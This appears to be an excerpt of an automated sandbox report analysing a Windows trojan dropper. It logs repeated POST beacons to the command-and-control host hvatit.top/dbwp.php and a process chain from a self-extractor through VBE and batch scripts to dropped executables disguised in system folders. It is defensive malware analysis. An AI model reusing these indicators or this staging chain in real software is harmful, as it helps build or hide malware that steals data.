                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: hvatit.top
                                    Source: unknownHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hvatit.top
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hvatit.top/
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000003311000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hvatit.top/dbwp.php
                                    Source: ChainPortServerBrowsermonitor.exe, 00000004.00000002.1713284618.0000000003665000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess Stats: CPU usage > 49%
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FB6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00FB6FAA
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FB848E0_2_00FB848E
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FB40FE0_2_00FB40FE
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FC00B70_2_00FC00B7
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FC40880_2_00FC4088
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FD51C90_2_00FD51C9
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FC71530_2_00FC7153
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FB32F70_2_00FB32F7
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FC62CA0_2_00FC62CA
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FC43BF0_2_00FC43BF
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FBF4610_2_00FBF461
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FDD4400_2_00FDD440
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FBC4260_2_00FBC426
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FC77EF0_2_00FC77EF
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FDD8EE0_2_00FDD8EE
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FB286B0_2_00FB286B
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FE19F40_2_00FE19F4
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FBE9B70_2_00FBE9B7
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FC6CDC0_2_00FC6CDC
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FC3E0B0_2_00FC3E0B
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FBEFE20_2_00FBEFE2
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FD4F9A0_2_00FD4F9A
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeCode function: 4_2_00007FFD9BBD71184_2_00007FFD9BBD7118
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeCode function: 9_2_00007FFD9BA20D489_2_00007FFD9BA20D48
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeCode function: 9_2_00007FFD9BA20E439_2_00007FFD9BA20E43
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeCode function: 9_2_00007FFD9BE171189_2_00007FFD9BE17118
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CUGzHwzy.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: String function: 00FCEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: String function: 00FCF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: String function: 00FCEB78 appears 39 times
                                    Source: cuAvoExY41.exe, 00000000.00000003.1650949859.0000000000B16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs cuAvoExY41.exe
                                    Source: cuAvoExY41.exe, 00000000.00000003.1650949859.0000000000B16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs cuAvoExY41.exe
                                    Source: cuAvoExY41.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs cuAvoExY41.exe
                                    Source: cuAvoExY41.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: ChainPortServerBrowsermonitor.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe0.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: WmiPrvSE.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: upfc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.troj.evad.winEXE@18/28@1/1
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FB6C74 GetLastError,FormatMessageW,0_2_00FB6C74
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00FCA6C2
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\ddDNduPc.logJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-m1fLYfg6CkBPCrY00CRN
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" "
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCommand line argument: sfxname0_2_00FCDF1E
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCommand line argument: sfxstime0_2_00FCDF1E
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCommand line argument: STARTDLG0_2_00FCDF1E
                                    Source: cuAvoExY41.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: cuAvoExY41.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: cuAvoExY41.exeReversingLabs: Detection: 65%
                                    Source: cuAvoExY41.exeVirustotal: Detection: 57%
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeFile read: C:\Users\user\Desktop\cuAvoExY41.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\cuAvoExY41.exe "C:\Users\user\Desktop\cuAvoExY41.exe"
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe "C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe"
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe "C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe"
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe "C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe"Jump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe "C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: windows.storage.dllJump to behavior
